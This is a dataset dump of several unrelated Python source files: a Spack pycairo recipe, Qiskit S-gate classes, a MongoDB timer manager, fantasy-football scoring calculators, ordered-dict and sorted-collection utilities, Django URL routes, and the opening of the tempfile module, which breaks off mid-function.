text
stringlengths 2
999k
|
|---|
# Copyright 2013-2021 Lawrence Livermore National Security, LLC and other
# Spack Project Developers. See the top-level COPYRIGHT file for details.
#
# SPDX-License-Identifier: (Apache-2.0 OR MIT)
import os
from spack import *
class PyPycairo(PythonPackage):
"""Pycairo is a set of Python bindings for the cairo graphics library."""
homepage = "https://www.cairographics.org/pycairo/"
pypi = "pycairo/pycairo-1.17.1.tar.gz"
version('1.20.0', sha256='5695a10cb7f9ae0d01f665b56602a845b0a8cb17e2123bfece10c2e58552468c')
version('1.18.1', sha256='70172e58b6bad7572a3518c26729b074acdde15e6fee6cbab6d3528ad552b786')
version('1.17.1', sha256='0f0a35ec923d87bc495f6753b1e540fd046d95db56a35250c44089fbce03b698')
depends_on('cairo@1.15.10: +pdf', when='@1.20.0:')
depends_on('cairo@1.13.1: +pdf', when='@:1.18.1')
depends_on('pkgconfig', type='build')
depends_on('py-setuptools', type='build')
depends_on('python@2.7:2.8,3.3:', when='@:1.17.1', type=('build', 'run'))
depends_on('python@2.7:2.8,3.4:3.7', when='@1.18.1:1.19', type=('build', 'run'))
depends_on('python@3.6:3', when='@1.20.0:', type=('build', 'run'))
@run_after('install')
def post_install(self):
src = self.prefix.lib + '/pkgconfig/py3cairo.pc'
dst = self.prefix.lib + '/pkgconfig/pycairo.pc'
if os.path.exists(src) and not os.path.exists(dst):
copy(src, dst)
|
# This code is part of Qiskit.
#
# (C) Copyright IBM 2017.
#
# This code is licensed under the Apache License, Version 2.0. You may
# obtain a copy of this license in the LICENSE.txt file in the root directory
# of this source tree or at http://www.apache.org/licenses/LICENSE-2.0.
#
# Any modifications or derivative works of this code must retain this
# copyright notice, and modified files need to carry a notice indicating
# that they have been altered from the originals.
"""The S and Sdg gate."""
import numpy
from qiskit.qasm import pi
from qiskit.circuit.gate import Gate
from qiskit.circuit.quantumregister import QuantumRegister
class SGate(Gate):
r"""Single qubit S gate (Z**0.5).
It induces a :math:`\pi/2` phase, and is sometimes called the P gate (phase).
This is a Clifford gate and a square-root of Pauli-Z.
**Matrix Representation:**
.. math::
S = \begin{pmatrix}
1 & 0 \\
0 & i
\end{pmatrix}
**Circuit symbol:**
.. parsed-literal::
βββββ
q_0: β€ S β
βββββ
Equivalent to a :math:`\pi/2` radian rotation about the Z axis.
"""
def __init__(self, label=None):
"""Create new S gate."""
super().__init__('s', 1, [], label=label)
def _define(self):
"""
gate s a { u1(pi/2) a; }
"""
# pylint: disable=cyclic-import
from qiskit.circuit.quantumcircuit import QuantumCircuit
from .u1 import U1Gate
q = QuantumRegister(1, 'q')
qc = QuantumCircuit(q, name=self.name)
rules = [
(U1Gate(pi / 2), [q[0]], [])
]
qc._data = rules
self.definition = qc
def inverse(self):
"""Return inverse of S (SdgGate)."""
return SdgGate()
def to_matrix(self):
"""Return a numpy.array for the S gate."""
return numpy.array([[1, 0],
[0, 1j]], dtype=complex)
class SdgGate(Gate):
r"""Single qubit S-adjoint gate (~Z**0.5).
It induces a :math:`-\pi/2` phase.
This is a Clifford gate and a square-root of Pauli-Z.
**Matrix Representation:**
.. math::
Sdg = \begin{pmatrix}
1 & 0 \\
0 & -i
\end{pmatrix}
**Circuit symbol:**
.. parsed-literal::
βββββββ
q_0: β€ Sdg β
βββββββ
Equivalent to a :math:`\pi/2` radian rotation about the Z axis.
"""
def __init__(self, label=None):
"""Create new Sdg gate."""
super().__init__('sdg', 1, [], label=label)
def _define(self):
"""
gate sdg a { u1(-pi/2) a; }
"""
# pylint: disable=cyclic-import
from qiskit.circuit.quantumcircuit import QuantumCircuit
from .u1 import U1Gate
q = QuantumRegister(1, 'q')
qc = QuantumCircuit(q, name=self.name)
rules = [
(U1Gate(-pi / 2), [q[0]], [])
]
qc._data = rules
self.definition = qc
def inverse(self):
"""Return inverse of Sdg (SGate)."""
return SGate()
def to_matrix(self):
"""Return a numpy.array for the Sdg gate."""
return numpy.array([[1, 0],
[0, -1j]], dtype=complex)
|
"""Data manager for the timers."""
from datetime import datetime, timedelta
from typing import Optional, List
import pymongo
from bson import ObjectId
from models import TimerModel, TimerListResult, OID_KEY
from mongodb.factory.results import WriteOutcome
from extutils.checker import arg_type_ensure
from extutils.locales import UTC
from extutils.dt import is_tz_naive, now_utc_aware, make_tz_aware
from JellyBot.systemconfig import Bot
from ._base import BaseCollection
__all__ = ("TimerManager",)
DB_NAME = "timer"
class _TimerManager(BaseCollection):
database_name = DB_NAME
collection_name = "timer"
model_class = TimerModel
def build_indexes(self):
self.create_index(TimerModel.Keyword.key)
self.create_index(TimerModel.DeletionTime.key, expireAfterSeconds=0)
@arg_type_ensure
def add_new_timer(
self, ch_oid: ObjectId, keyword: str, title: str, target_time: datetime, *,
countup: bool = False, period_sec: int = 0) -> WriteOutcome:
"""`target_time` is recommended to be tz-aware. Tzinfo will be forced to be UTC if tz-naive."""
# Force target time to be tz-aware in UTC
if is_tz_naive(target_time):
target_time = make_tz_aware(target_time, UTC.to_tzinfo())
mdl = TimerModel(
ChannelOid=ch_oid, Keyword=keyword, Title=title, TargetTime=target_time,
Countup=countup, PeriodSeconds=period_sec)
if not countup:
mdl.deletion_time = target_time + timedelta(days=Bot.Timer.AutoDeletionDays)
mdl.deletion_time = make_tz_aware(mdl.deletion_time, target_time.tzinfo)
outcome, _ = self.insert_one_model(mdl)
return outcome
@arg_type_ensure
def del_timer(self, timer_oid: ObjectId) -> bool:
"""
Delete the timer by its OID.
:param timer_oid: OID of the timer to be deleted
:return: if the timer was successfully deleted
"""
return self.delete_one({OID_KEY: timer_oid}).deleted_count > 0
@arg_type_ensure
def list_all_timer(self, channel_oid: ObjectId) -> TimerListResult:
"""
List all the timers in the channel ``channel_oid``.
All timers in the returned result will be sorted by its target time (ASC).
:param channel_oid: channel of the timers
:return: a `TimerListResult` containing the timers that match the conditions
"""
return TimerListResult(
self.find_cursor_with_count(
{TimerModel.ChannelOid.key: channel_oid},
sort=[(TimerModel.TargetTime.key, pymongo.ASCENDING)]
)
)
@arg_type_ensure
def get_timers(self, channel_oid: ObjectId, keyword: str) -> TimerListResult:
"""
Get the timers in the channel ``channel_oid`` which keyword ``keyword``.
``keyword`` needs to be an exact match, **NOT** partial match.
All timers in the returned result will be sorted by its target time (ASC).
:param channel_oid: channel of the timers
:param keyword: keyword of the timers
:return: a `TimerListResult` containing the timers that match the conditions
"""
return TimerListResult(
self.find_cursor_with_count(
{TimerModel.Keyword.key: keyword, TimerModel.ChannelOid.key: channel_oid},
sort=[(TimerModel.TargetTime.key, pymongo.ASCENDING)]
)
)
@arg_type_ensure
def get_notify(self, channel_oid: ObjectId, within_secs: Optional[int] = None) -> List[TimerModel]:
"""
Get a list of unnotified timers which will timeup in ``within_secs`` seconds in ``channel_oid``.
Returned timers will be sorted by its target time (ASC).
:param channel_oid: channel of the timers
:param within_secs: timers that will timeup within this amount of seconds will be returned
:return: a list of timers that is not yet notified and will timeup in `within_secs` seconds
"""
now = now_utc_aware()
filter_ = {
TimerModel.ChannelOid.key: channel_oid,
TimerModel.TargetTime.key: {
"$lt": now + timedelta(seconds=within_secs if within_secs else Bot.Timer.MaxNotifyRangeSeconds),
"$gt": now
},
TimerModel.Notified.key: False
}
ret = list(self.find_cursor_with_count(filter_, sort=[(TimerModel.TargetTime.key, pymongo.ASCENDING)]))
self.update_many_async(filter_, {"$set": {TimerModel.Notified.key: True}})
return ret
@arg_type_ensure
def get_time_up(self, channel_oid: ObjectId) -> List[TimerModel]:
"""
Get a list of unnotified timers which timed up in ``channel_oid``.
All timers in the returned result will be sorted by its target time (ASC).
:param channel_oid: channel of the timers
:return: a list of timers that is not yet notified and already timed up
"""
now = now_utc_aware()
filter_ = {
TimerModel.ChannelOid.key: channel_oid,
TimerModel.TargetTime.key: {"$lt": now},
TimerModel.NotifiedExpired.key: False
}
ret = list(self.find_cursor_with_count(filter_, sort=[(TimerModel.TargetTime.key, pymongo.ASCENDING)]))
self.update_many_async(filter_, {"$set": {TimerModel.NotifiedExpired.key: True}})
return ret
@staticmethod
def get_notify_within_secs(message_frequency: float):
"""
Get a time range calculated by ``message_frequency`` which can be used to get the timers for notification.
Calculate formula: **message frequency x 20 + 600**
If the calculated result is greater than ``Bot.Timer.MaxNotifyRangeSeconds``,
then ``Bot.Timer.MaxNotifyRangeSeconds`` will be returned instead.
:param message_frequency: message frequency in seconds per message
:return: time range to be used to get the timers for notification
"""
return min(message_frequency * 20 + 600, Bot.Timer.MaxNotifyRangeSeconds)
TimerManager = _TimerManager()
|
from daily_fantasy_sports_scoring_calculators.core.calculators.scoring import StatisticalCategoryPointsCalculator, \
StatisticalValueCalculator
from daily_fantasy_sports_scoring_calculators.draft_kings.nfl.scoring.calculators.value_to_points.offensive import \
PassingTouchdownsCalculator as PassingTouchdownsPointsCalculator, \
HasAchievedAtLeast300YardsCalculator as HasAchievedAtLeast300PassingYardsPointsCalculator, \
PassingYardageCalculator as PassingYardagePointsCalculator, \
HasAchievedAtLeast100YardsCalculator as HasAchievedAtLeast100YardsPointsCalculator, \
NonPassingTouchdownsCalculator as NonPassingTouchdownsPointsCalculator, \
NonPassingYardsCalculator as NonPassingYardsPointsCalculator, \
TurnoversCalculator as TurnoversPointsCalculator, \
TwoPointConversionsCalculator as TwoPointConversionsPointsCalculator, \
ReceptionsCalculator as ReceptionsPointsCalculator
from daily_fantasy_sports_scoring_calculators.draft_kings.nfl.statistics.calculators.offensive import \
PassingTouchdownsCalculator as PassingTouchdownsValueCalculator, \
HasAchievedMinimumYardageRequirementCalculator as HasAchievedMinimumYardageRequirementValueCalculator, \
InterceptionsCalculator as InterceptionsValueCalculator, \
RushingTouchdownsCalculator as RushingTouchdownsValueCalculator, \
RushingYardageCalculator as RushingYardageValueCalculator, \
ReceivingTouchdownsCalculator as ReceivingTouchdownsValueCalculator, \
ReceptionsCalculator as ReceptionsValueCalculator, \
KickoffsReturnTouchdownsCalculator as KickoffsReturnTouchdownsValueCalculator, \
PuntReturnTouchdownsCalculator as PuntReturnTouchdownsValueCalculator, \
FieldGoalReturnTouchdownsCalculator as FieldGoalReturnTouchdownsValueCalculator, \
FumblesLostCalculator as FumblesLostValueCalculator, \
TwoPointConversionsCaughtCalculator as TwoPointConversionsCaughtValueCalculator, \
TwoPointConversionsRushedCalculator as TwoPointConversionsRushedValueCalculator, \
TwoPointConversionsThrownCalculator as TwoPointConversionsThrownValueCalculator, \
FumbleRecoveryTouchdownsCalculator as FumbleRecoveryTouchdownsValueCalculator, \
ReceivingYardageCalculator as ReceivingYardageValueCalculator, \
PassingYardageCalculator as PassingYardageValueCalculator
passing_yardage_value_calculator = PassingYardageValueCalculator()
receiving_yardage_value_calculator = ReceivingYardageValueCalculator()
rushing_yardage_value_calculator = RushingYardageValueCalculator()
non_passing_yards_points_calculator = NonPassingYardsPointsCalculator()
class PassingTouchdownsCalculator(StatisticalCategoryPointsCalculator):
def __init__(self):
super().__init__(
PassingTouchdownsValueCalculator(),
PassingTouchdownsPointsCalculator())
class NonPassingTouchdownsCalculator(StatisticalCategoryPointsCalculator):
def __init__(self, value_calculator: StatisticalValueCalculator):
super().__init__(value_calculator, NonPassingTouchdownsPointsCalculator())
class HasAchievedAtLeast300PassingYardsCalculator(StatisticalCategoryPointsCalculator):
def __init__(self):
super().__init__(
HasAchievedMinimumYardageRequirementValueCalculator(
yardage_value_calculator=passing_yardage_value_calculator,
minimum_inclusive_required_yardage=300
),
HasAchievedAtLeast300PassingYardsPointsCalculator()
)
class PassingYardageCalculator(StatisticalCategoryPointsCalculator):
def __init__(self):
super().__init__(
passing_yardage_value_calculator,
PassingYardagePointsCalculator())
class TurnoversCalculator(StatisticalCategoryPointsCalculator):
def __init__(self, value_calculator: StatisticalValueCalculator):
super().__init__(value_calculator, TurnoversPointsCalculator())
def __eq__(self, o: object) -> bool:
if isinstance(o, TurnoversCalculator):
return o.value_calculator == self.value_calculator and super().__eq__(o)
return False
def __hash__(self):
return hash((self.value_calculator, super().__hash__()))
class InterceptionsCalculator(TurnoversCalculator):
def __init__(self):
super().__init__(InterceptionsValueCalculator())
class RushingTouchdownsCalculator(NonPassingTouchdownsCalculator):
def __init__(self):
super().__init__(RushingTouchdownsValueCalculator())
class RushingYardageCalculator(StatisticalCategoryPointsCalculator):
def __init__(self):
super().__init__(
rushing_yardage_value_calculator,
non_passing_yards_points_calculator)
class HasReached100YardsRushingPointsLimit(
StatisticalCategoryPointsCalculator):
def __init__(self):
super().__init__(
HasAchievedMinimumYardageRequirementValueCalculator(
yardage_value_calculator=rushing_yardage_value_calculator,
minimum_inclusive_required_yardage=100
),
HasAchievedAtLeast100YardsPointsCalculator()
)
class ReceivingTouchdownsCalculator(NonPassingTouchdownsCalculator):
def __init__(self):
super().__init__(ReceivingTouchdownsValueCalculator())
class ReceivingYardsCalculator(StatisticalCategoryPointsCalculator):
def __init__(self):
super().__init__(
receiving_yardage_value_calculator,
non_passing_yards_points_calculator)
class HasReached100YardsReceivingCalculator(StatisticalCategoryPointsCalculator):
def __init__(self):
super().__init__(
value_calculator=HasAchievedMinimumYardageRequirementValueCalculator(
yardage_value_calculator=receiving_yardage_value_calculator,
minimum_inclusive_required_yardage=100),
points_calculator=HasAchievedAtLeast100YardsPointsCalculator())
class ReceptionsCalculator(StatisticalCategoryPointsCalculator):
def __init__(self):
super().__init__(ReceptionsValueCalculator(), ReceptionsPointsCalculator())
class PuntReturnTouchdownsCalculator(NonPassingTouchdownsCalculator):
def __init__(self):
super().__init__(PuntReturnTouchdownsValueCalculator())
class KickReturnTouchdownsCalculator(NonPassingTouchdownsCalculator):
def __init__(self):
super().__init__(KickoffsReturnTouchdownsValueCalculator())
class FieldGoalReturnTouchdownsCalculator(NonPassingTouchdownsCalculator):
def __init__(self):
super().__init__(FieldGoalReturnTouchdownsValueCalculator())
class FumblesLostCalculator(TurnoversCalculator):
def __init__(self):
super().__init__(FumblesLostValueCalculator())
class TwoPointConversionCalculator(StatisticalCategoryPointsCalculator):
def __init__(self, value_calculator: StatisticalValueCalculator):
super().__init__(value_calculator, TwoPointConversionsPointsCalculator())
def __eq__(self, o: object) -> bool:
if isinstance(o, TwoPointConversionCalculator):
return o.value_calculator == self.value_calculator and super().__eq__(o)
return False
def __hash__(self):
return hash((self.value_calculator, super().__hash__()))
class TwoPointConversionsThrownCalculator(TwoPointConversionCalculator):
def __init__(self):
super().__init__(TwoPointConversionsThrownValueCalculator())
class TwoPointConversionsCaughtCalculator(TwoPointConversionCalculator):
def __init__(self):
super().__init__(TwoPointConversionsCaughtValueCalculator())
class TwoPointConversionsRushedCalculator(TwoPointConversionCalculator):
def __init__(self):
super().__init__(TwoPointConversionsRushedValueCalculator())
class FumbleRecoveryTouchdownsCalculator(NonPassingTouchdownsCalculator):
def __init__(self):
super().__init__(FumbleRecoveryTouchdownsValueCalculator())
|
# Copyright (c) 2009 Raymond Hettinger
#
# Permission is hereby granted, free of charge, to any person
# obtaining a copy of this software and associated documentation files
# (the "Software"), to deal in the Software without restriction,
# including without limitation the rights to use, copy, modify, merge,
# publish, distribute, sublicense, and/or sell copies of the Software,
# and to permit persons to whom the Software is furnished to do so,
# subject to the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES
# OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT
# HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY,
# WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING
# FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR
# OTHER DEALINGS IN THE SOFTWARE.
from urllib.parse import urlparse
from collections import Callable, defaultdict
try:
from UserDict import UserDict
from UserDict import DictMixin
except ImportError:
from collections import UserDict
from collections import MutableMapping as DictMixin
class OrderedDict(dict, DictMixin):
def __init__(self, *args, **kwds):
if len(args) > 1:
raise TypeError('expected at most 1 arguments, got %d' % len(args))
try:
self.__end
except AttributeError:
self.clear()
self.update(*args, **kwds)
def clear(self):
self.__end = end = []
end += [None, end, end] # sentinel node for doubly linked list
self.__map = {} # key --> [key, prev, next]
dict.clear(self)
def __setitem__(self, key, value):
if key not in self:
end = self.__end
curr = end[1]
curr[2] = end[1] = self.__map[key] = [key, curr, end]
dict.__setitem__(self, key, value)
def __delitem__(self, key):
dict.__delitem__(self, key)
key, prev, next = self.__map.pop(key)
prev[2] = next
next[1] = prev
def __iter__(self):
end = self.__end
curr = end[2]
while curr is not end:
yield curr[0]
curr = curr[2]
def __reversed__(self):
end = self.__end
curr = end[1]
while curr is not end:
yield curr[0]
curr = curr[1]
def popitem(self, last=True):
if not self:
raise KeyError('dictionary is empty')
if last:
key = reversed(self).next()
else:
key = iter(self).next()
value = self.pop(key)
return key, value
def __reduce__(self):
items = [[k, self[k]] for k in self]
tmp = self.__map, self.__end
del self.__map, self.__end
inst_dict = vars(self).copy()
self.__map, self.__end = tmp
if inst_dict:
return (self.__class__, (items,), inst_dict)
return self.__class__, (items,)
def keys(self):
return list(self)
setdefault = DictMixin.setdefault
update = DictMixin.update
pop = DictMixin.pop
values = DictMixin.values
items = DictMixin.items
#iterkeys = DictMixin.iterkeys
#itervalues = DictMixin.itervalues
#iteritems = DictMixin.iteritems
def __repr__(self):
if not self:
return '%s()' % (self.__class__.__name__,)
return '%s(%r)' % (self.__class__.__name__, self.items())
def copy(self):
return self.__class__(self)
@classmethod
def fromkeys(cls, iterable, value=None):
d = cls()
for key in iterable:
d[key] = value
return d
def __eq__(self, other):
if isinstance(other, OrderedDict):
if len(self) != len(other):
return False
for p, q in zip(self.items(), other.items()):
if p != q:
return False
return True
return dict.__eq__(self, other)
def __ne__(self, other):
return not self == other
"""
<http://stackoverflow.com/questions/6190331/can-i-do-an-ordered-default-dict-in-python>
"""
class DefaultOrderedDict(OrderedDict):
def __init__(self, default_factory=None, *a, **kw):
if (default_factory is not None and
not isinstance(default_factory, Callable)):
raise TypeError('first argument must be callable')
OrderedDict.__init__(self, *a, **kw)
self.default_factory = default_factory
def __getitem__(self, key):
try:
return OrderedDict.__getitem__(self, key)
except KeyError:
return self.__missing__(key)
def __missing__(self, key):
if self.default_factory is None:
raise KeyError(key)
self[key] = value = self.default_factory()
return value
def __reduce__(self):
if self.default_factory is None:
args = tuple()
else:
args = self.default_factory,
return type(self), args, None, None, self.items()
def copy(self):
return self.__copy__()
def __copy__(self):
return type(self)(self.default_factory, self)
def __deepcopy__(self, memo):
import copy
return type(self)(self.default_factory,
copy.deepcopy(self.items()))
def __repr__(self):
return 'OrderedDefaultDict(%s, %s)' % (self.default_factory,
OrderedDict.__repr__(self))
def parse_qs(qs, keep_blank_values=0, strict_parsing=0, keep_attr_order=True):
"""
Kind of like urlparse.parse_qs, except returns an ordered dict.
Also avoids replicating that function's bad habit of overriding the
built-in 'dict' type.
Taken from below with modification:
<https://bitbucket.org/btubbs/thumpy/raw/8cdece404f15/thumpy.py>
"""
od = DefaultOrderedDict(list) if keep_attr_order else defaultdict(list)
for name, value in urlparse.parse_qsl(qs, keep_blank_values, strict_parsing):
od[name].append(value)
return od
"""
Recipe from <http://code.activestate.com/recipes/577197-sortedcollection/>.
"""
from bisect import bisect_left, bisect_right
class SortedCollection(object):
'''Sequence sorted by a key function.
SortedCollection() is much easier to work with than using bisect() directly.
It supports key functions like those use in sorted(), min(), and max().
The result of the key function call is saved so that keys can be searched
efficiently.
Instead of returning an insertion-point which can be hard to interpret, the
five find-methods return a specific item in the sequence. They can scan for
exact matches, the last item less-than-or-equal to a key, or the first item
greater-than-or-equal to a key.
Once found, an item's ordinal position can be located with the index() method.
New items can be added with the insert() and insert_right() methods.
Old items can be deleted with the remove() method.
The usual sequence methods are provided to support indexing, slicing,
length lookup, clearing, copying, forward and reverse iteration, contains
checking, item counts, item removal, and a nice looking repr.
Finding and indexing are O(log n) operations while iteration and insertion
are O(n). The initial sort is O(n log n).
The key function is stored in the 'key' attibute for easy introspection or
so that you can assign a new key function (triggering an automatic re-sort).
In short, the class was designed to handle all of the common use cases for
bisect but with a simpler API and support for key functions.
>>> from pprint import pprint
>>> from operator import itemgetter
>>> s = SortedCollection(key=itemgetter(2))
>>> for record in [
... ('roger', 'young', 30),
... ('angela', 'jones', 28),
... ('bill', 'smith', 22),
... ('david', 'thomas', 32)]:
... s.insert(record)
>>> pprint(list(s)) # show records sorted by age
[('bill', 'smith', 22),
('angela', 'jones', 28),
('roger', 'young', 30),
('david', 'thomas', 32)]
>>> s.find_le(29) # find oldest person aged 29 or younger
('angela', 'jones', 28)
>>> s.find_lt(28) # find oldest person under 28
('bill', 'smith', 22)
>>> s.find_gt(28) # find youngest person over 28
('roger', 'young', 30)
>>> r = s.find_ge(32) # find youngest person aged 32 or older
>>> s.index(r) # get the index of their record
3
>>> s[3] # fetch the record at that index
('david', 'thomas', 32)
>>> s.key = itemgetter(0) # now sort by first name
>>> pprint(list(s))
[('angela', 'jones', 28),
('bill', 'smith', 22),
('david', 'thomas', 32),
('roger', 'young', 30)]
'''
def __init__(self, iterable=(), key=None):
self._given_key = key
key = (lambda x: x) if key is None else key
decorated = sorted((key(item), item) for item in iterable)
self._keys = [k for k, item in decorated]
self._items = [item for k, item in decorated]
self._key = key
def _getkey(self):
return self._key
def _setkey(self, key):
if key is not self._key:
self.__init__(self._items, key=key)
def _delkey(self):
self._setkey(None)
key = property(_getkey, _setkey, _delkey, 'key function')
def clear(self):
self.__init__([], self._key)
def copy(self):
return self.__class__(self, self._key)
def __len__(self):
return len(self._items)
def __getitem__(self, i):
return self._items[i]
def __iter__(self):
return iter(self._items)
def __reversed__(self):
return reversed(self._items)
def __repr__(self):
return '%s(%r, key=%s)' % (
self.__class__.__name__,
self._items,
getattr(self._given_key, '__name__', repr(self._given_key))
)
def __reduce__(self):
return self.__class__, (self._items, self._given_key)
def __contains__(self, item):
k = self._key(item)
i = bisect_left(self._keys, k)
j = bisect_right(self._keys, k)
return item in self._items[i:j]
def index(self, item):
'Find the position of an item. Raise ValueError if not found.'
k = self._key(item)
i = bisect_left(self._keys, k)
j = bisect_right(self._keys, k)
return self._items[i:j].index(item) + i
def count(self, item):
'Return number of occurrences of item'
k = self._key(item)
i = bisect_left(self._keys, k)
j = bisect_right(self._keys, k)
return self._items[i:j].count(item)
def insert(self, item):
'Insert a new item. If equal keys are found, add to the left'
k = self._key(item)
i = bisect_left(self._keys, k)
self._keys.insert(i, k)
self._items.insert(i, item)
def insert_right(self, item):
'Insert a new item. If equal keys are found, add to the right'
k = self._key(item)
i = bisect_right(self._keys, k)
self._keys.insert(i, k)
self._items.insert(i, item)
def remove(self, item):
'Remove first occurence of item. Raise ValueError if not found'
i = self.index(item)
del self._keys[i]
del self._items[i]
def find(self, item):
'Return first item with a key == item. Raise ValueError if not found.'
k = self._key(item)
i = bisect_left(self._keys, k)
if i != len(self) and self._keys[i] == k:
return self._items[i]
raise ValueError('No item found with key equal to: %r' % (k,))
def find_le(self, item):
'Return last item with a key <= item. Raise ValueError if not found.'
k = self._key(item)
i = bisect_right(self._keys, k)
if i:
return self._items[i - 1]
raise ValueError('No item found with key at or below: %r' % (k,))
def find_lt(self, item):
'Return last item with a key < item. Raise ValueError if not found.'
k = self._key(item)
i = bisect_left(self._keys, k)
if i:
return self._items[i - 1]
raise ValueError('No item found with key below: %r' % (k,))
def find_ge(self, item):
'Return first item with a key >= equal to item. Raise ValueError if not found'
k = self._key(item)
i = bisect_left(self._keys, k)
if i != len(self):
return self._items[i]
raise ValueError('No item found with key at or above: %r' % (k,))
def find_gt(self, item):
'Return first item with a key > item. Raise ValueError if not found'
k = self._key(item)
i = bisect_right(self._keys, k)
if i != len(self):
return self._items[i]
raise ValueError('No item found with key above: %r' % (k,))
|
# -*- coding: utf-8 -*-
# @Time : 2021/2/10 δΈε12:59
# @Author : εΈδΊδΈ
# @File : urls.py
# @Software: Pycharm
from django.conf import settings
from django.urls import path, include
from manager_app.apis.auth_api import ManagerLoginApiView, ManagerRegisterApiView
from manager_app.apis.manage_carousel_api import ManageCarouselApiView
from manager_app.apis.manage_commodity_api import ManagerCommodityCategoryApiView, ManageCommodityGroupApiView
from manager_app.apis.manage_permission_api import ManagePermissionApiView
from manager_app.apis.manage_role_api import ManageRoleApiView
from manager_app.apis.manage_seller_api import ManagerSellerPermApiView, ManagerSellerRoleApiView
app_name = "manager_app"
auth_patterns = [
path('login/', ManagerLoginApiView.as_view()),
path('register/', ManagerRegisterApiView.as_view()),
]
urlpatterns = {
path(f'{settings.URL_PREFIX}/auth/', include(auth_patterns)),
path(f'{settings.URL_PREFIX}/role/', ManageRoleApiView.as_view()),
path(f'{settings.URL_PREFIX}/permission/', ManagePermissionApiView.as_view()),
path(f'{settings.URL_PREFIX}/commodity-category/', ManagerCommodityCategoryApiView.as_view()),
path(f'{settings.URL_PREFIX}/commodity-group/', ManageCommodityGroupApiView.as_view()),
path(f'{settings.URL_PREFIX}/role/seller/', ManagerSellerRoleApiView.as_view()),
path(f'{settings.URL_PREFIX}/permission/seller/', ManagerSellerPermApiView.as_view()),
path(f'{settings.URL_PREFIX}/carousel/', ManageCarouselApiView.as_view())
}
|
"""Temporary files.
This module provides generic, low- and high-level interfaces for
creating temporary files and directories. All of the interfaces
provided by this module can be used without fear of race conditions
except for 'mktemp'. 'mktemp' is subject to race conditions and
should not be used; it is provided for backward compatibility only.
The default path names are returned as str. If you supply bytes as
input, all return values will be in bytes. Ex:
>>> tempfile.mkstemp()
(4, '/tmp/tmptpu9nin8')
>>> tempfile.mkdtemp(suffix=b'')
b'/tmp/tmppbi8f0hy'
This module also provides some data items to the user:
TMP_MAX - maximum number of names that will be tried before
giving up.
tempdir - If this is set to a string before the first use of
any routine from this module, it will be considered as
another candidate location to store temporary files.
"""
__all__ = [
"NamedTemporaryFile", "TemporaryFile", # high level safe interfaces
"SpooledTemporaryFile", "TemporaryDirectory",
"mkstemp", "mkdtemp", # low level safe interfaces
"mktemp", # deprecated unsafe interface
"TMP_MAX", "gettempprefix", # constants
"tempdir", "gettempdir",
"gettempprefixb", "gettempdirb",
]
# Imports.
import functools as _functools
import warnings as _warnings
import io as _io
import os as _os
import shutil as _shutil
import errno as _errno
from random import Random as _Random
import weakref as _weakref
try:
import _thread
except ImportError:
import _dummy_thread as _thread
_allocate_lock = _thread.allocate_lock
_text_openflags = _os.O_RDWR | _os.O_CREAT | _os.O_EXCL
if hasattr(_os, 'O_NOFOLLOW'):
_text_openflags |= _os.O_NOFOLLOW
_bin_openflags = _text_openflags
if hasattr(_os, 'O_BINARY'):
_bin_openflags |= _os.O_BINARY
if hasattr(_os, 'TMP_MAX'):
TMP_MAX = _os.TMP_MAX
else:
TMP_MAX = 10000
# This variable _was_ unused for legacy reasons, see issue 10354.
# But as of 3.5 we actually use it at runtime so changing it would
# have a possibly desirable side effect... But we do not want to support
# that as an API. It is undocumented on purpose. Do not depend on this.
template = "tmp"
# Internal routines.
_once_lock = _allocate_lock()
if hasattr(_os, "lstat"):
_stat = _os.lstat
elif hasattr(_os, "stat"):
_stat = _os.stat
else:
# Fallback. All we need is something that raises OSError if the
# file doesn't exist.
def _stat(fn):
fd = _os.open(fn, _os.O_RDONLY)
_os.close(fd)
def _exists(fn):
try:
_stat(fn)
except OSError:
return False
else:
return True
def _infer_return_type(*args):
"""Look at the type of all args and divine their implied return type."""
return_type = None
for arg in args:
if arg is None:
continue
if isinstance(arg, bytes):
if return_type is str:
raise TypeError("Can't mix bytes and non-bytes in "
"path components.")
return_type = bytes
else:
if return_type is bytes:
raise TypeError("Can't mix bytes and non-bytes in "
"path components.")
return_type = str
if return_type is None:
return str # tempfile APIs return a str by default.
return return_type
def _sanitize_params(prefix, suffix, dir):
"""Common parameter processing for most APIs in this module."""
output_type = _infer_return_type(prefix, suffix, dir)
if suffix is None:
suffix = output_type()
if prefix is None:
if output_type is str:
prefix = template
else:
prefix = _os.fsencode(template)
if dir is None:
if output_type is str:
dir = gettempdir()
else:
dir = gettempdirb()
return prefix, suffix, dir, output_type
class _RandomNameSequence:
"""An instance of _RandomNameSequence generates an endless
sequence of unpredictable strings which can safely be incorporated
into file names. Each string is six characters long. Multiple
threads can safely use the same instance at the same time.
_RandomNameSequence is an iterator."""
characters = "abcdefghijklmnopqrstuvwxyz0123456789_"
@property
def rng(self):
cur_pid = _os.getpid()
if cur_pid != getattr(self, '_rng_pid', None):
self._rng = _Random()
self._rng_pid = cur_pid
return self._rng
def __iter__(self):
return self
def __next__(self):
c = self.characters
choose = self.rng.choice
letters = [choose(c) for dummy in range(8)]
return ''.join(letters)
def _candidate_tempdir_list():
"""Generate a list of candidate temporary directories which
_get_default_tempdir will try."""
dirlist = []
# First, try the environment.
for envname in 'TMPDIR', 'TEMP', 'TMP':
dirname = _os.getenv(envname)
if dirname: dirlist.append(dirname)
# Failing that, try OS-specific locations.
if _os.name == 'nt':
dirlist.extend([ r'c:\temp', r'c:\tmp', r'\temp', r'\tmp' ])
elif _os.name != 'uwp_os':
dirlist.extend([ '/tmp', '/var/tmp', '/usr/tmp' ])
# As a last resort, the current directory.
try:
dirlist.append(_os.getcwd())
except (AttributeError, OSError):
dirlist.append(_os.curdir)
return dirlist
def _get_default_tempdir():
"""Calculate the default directory to use for temporary files.
This routine should be called exactly once.
We determine whether or not a candidate temp dir is usable by
trying to create and write to a file in that directory. If this
is successful, the test file is deleted. To prevent denial of
service, the name of the test file must be randomized."""
namer = _RandomNameSequence()
dirlist = _candidate_tempdir_list()
for dir in dirlist:
